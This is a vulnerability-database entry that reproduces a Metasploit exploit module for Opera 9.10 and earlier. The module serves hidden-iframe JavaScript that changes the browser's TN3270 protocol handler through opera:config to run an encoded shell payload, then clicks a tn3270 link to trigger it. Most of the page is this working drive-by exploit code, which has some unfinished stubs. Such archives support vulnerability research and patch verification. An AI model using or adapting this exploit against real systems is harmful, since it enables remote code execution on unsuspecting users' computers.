Opera <= 9.10 Configuration Overwrite

🗓️ 01 Jul 2014 00:00:00Reported by RootType
Opera <= 9.10 Configuration Overwrite allows unrestricted script access to its configuration page, opera:config, potentially enabling arbitrary code execution

                                                ##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require &#39;msf/core&#39;


class Metasploit3 &#60; Msf::Exploit::Remote

	#
	# This module acts as an HTTP server
	#
	include Msf::Exploit::Remote::HttpServer::HTML

	include Msf::Exploit::Remote::BrowserAutopwn
	autopwn_info({
		:ua_name =&#62; HttpClients::OPERA,
		:ua_ver =&#62; &#34;1.0&#34;,
		:os_name =&#62; [ OperatingSystems::WINDOWS, OperatingSystems::LINUX ],
		:javascript =&#62; true,
		:rank =&#62; ExcellentRanking, # reliable exe writer
		:vuln_test =&#62; nil,
	})

	def initialize(info = {})
		super(update_info(info,{
			&#39;Name&#39;           =&#62; &#39;Opera 9 Configuration Overwrite&#39;,
			&#39;Description&#39;    =&#62; %q{
				Opera web browser in versions &#60;= 9.10 allows unrestricted script
				access to its configuration page, opera:config, allowing an
				attacker to change settings and potentially execute arbitrary
				code.
			},
			&#39;License&#39;        =&#62; BSD_LICENSE,
			&#39;Author&#39;         =&#62;
				[
					&#39;egypt&#39;, # stolen from mpack
				],
			&#39;Version&#39;        =&#62; &#39;$Revision: 6655 $&#39;,
			&#39;References&#39;     =&#62; [ ],
			&#39;Payload&#39;        =&#62;
				{
					&#39;ExitFunc&#39; =&#62; &#39;process&#39;,
					&#39;Space&#39;    =&#62; 2048,
					&#39;DisableNops&#39; =&#62; true,
					&#39;BadChars&#39; =&#62; &#34; |&#39;&#60;&#62;&&#34;,
				},
			&#39;Targets&#39;        =&#62;
				[
					#[ &#39;Opera &#60; 9.10 Windows&#39;, 
					#	{
					#		&#39;Platform&#39; =&#62; &#39;win&#39;,
					#		&#39;Arch&#39; =&#62; ARCH_X86,
					#	}
					#],
					[ &#39;Opera &#60; 9.10 Unix Cmd&#39;, 
						{
							&#39;Platform&#39; =&#62; &#39;unix&#39;,
							&#39;Arch&#39; =&#62; ARCH_CMD,
						}
					],
				],
			# Not sure when this was disclosed but it&#39;s been known since at
			# least March 5, 2007, since that&#39;s the release date on the version
			# of mpack I stole this from.
			&#39;DisclosureDate&#39; =&#62; &#39;Mar 5 2007&#39;
			}))
	end

	def on_request_uri(cli, request)

		case request.uri
		when /payload$/
			print_status(&#34;Generating payload for #{target} #{target.platform}&#34;)
			# Re-generate the payload
			if ((p = regenerate_payload(cli)) == nil)
				print_error(&#34;Payload generation failed, 404ing request for #{request.uri}&#34;)
				send_not_found(cli)
				return
			end
			# NOTE: Change this to the new API when commiting to trunk
			#content = Msf::Util::EXE.to_win32pe(p.encoded)
			#content = Rex::Text.to_win32pe(p.encoded)
			content = &#34;foo&#34;
			print_status(&#34;Generated #{content.length} bytes&#34;)
			headers = { &#39;Content-Type&#39; =&#62; &#39;application/octet-stream&#39; }
		when get_resource
			print_status(&#34;Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...&#34;)
			content =  &#34;&#60;body&#62;&#60;script&#62;&#34;
			content &#60;&#60; generate_evil_js(cli, request)
			content &#60;&#60; &#34;&#60;/script&#62;&#60;/body&#62;&#34;
			headers = { &#39;Content-Type&#39; =&#62; &#39;text/html&#39; }
		else
			print_status(&#34;404ing request for #{request.uri}&#34;)
			send_not_found(cli)
			return
		end
		send_response_html(cli, content, headers)

	end

	def generate_evil_js(cli, request)
		# There are a bunch of levels of quotes here, so the easiest way to
		# make everything line up is to hex escape the command to run
		p = regenerate_payload(cli).encoded
		#print_status(p)
		shellcode = Rex::Text.to_hex(p, &#34;%&#34;)
		js = &#60;&#60;ENDJS
blank_iframe = document.createElement(&#39;iframe&#39;);
blank_iframe.src = &#39;about:blank&#39;;
blank_iframe.setAttribute(&#39;id&#39;, &#39;blank_iframe_window&#39;);
blank_iframe.setAttribute(&#39;style&#39;, &#39;display:none&#39;);
document.body.appendChild(blank_iframe);
blank_iframe_window.eval(
	&#34;config_iframe = document.createElement(&#39;iframe&#39;);&#34; +
    &#34;config_iframe.setAttribute(&#39;id&#39;, &#39;config_iframe_window&#39;);&#34; +
    &#34;config_iframe.src = &#39;opera:config&#39;;&#34; +
    &#34;document.body.appendChild(config_iframe);&#34; +
    &#34;cache_iframe = document.createElement(&#39;iframe&#39;);&#34; +
    &#34;cache_iframe.src = &#39;opera:cache&#39;;&#34; +
    &#34;cache_iframe.onload = function ()&#34; +
    &#34;{&#34; +
    &#34;	config_iframe_window.eval&#34; +
    &#34;	(\\&#34;&#34; +
	&#34;	old_handler = opera.getPreference(&#39;Network&#39;,&#39;TN3270 App&#39;);&#34; +
	&#34;	shellcode = &#39;#{shellcode}&#39;;&#34; +
    &#34;	opera.setPreference(&#39;Network&#39;,&#39;TN3270 App&#39;,&#39;/bin/sh -c &#39; + unescape(shellcode));&#34; +
    &#34;	app_link = document.createElement(&#39;a&#39;);&#34; +
    &#34;	app_link.setAttribute(&#39;href&#39;, &#39;tn3270://#{Rex::Text.rand_text_alpha(rand(5)+5)}&#39;);&#34; +
    &#34;	app_link.click();&#34; +
    &#34;	setTimeout(function () {opera.setPreference(&#39;Network&#39;,&#39;TN3270 App&#39;,old_handler)},1000);&#34; +
    &#34;	\\&#34;);&#34; +
    &#34;};&#34; +
    &#34;document.body.appendChild(cache_iframe);&#34; +
&#34;&#34;);
ENDJS

	end

	def generate_evil_preference()

	end

end
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1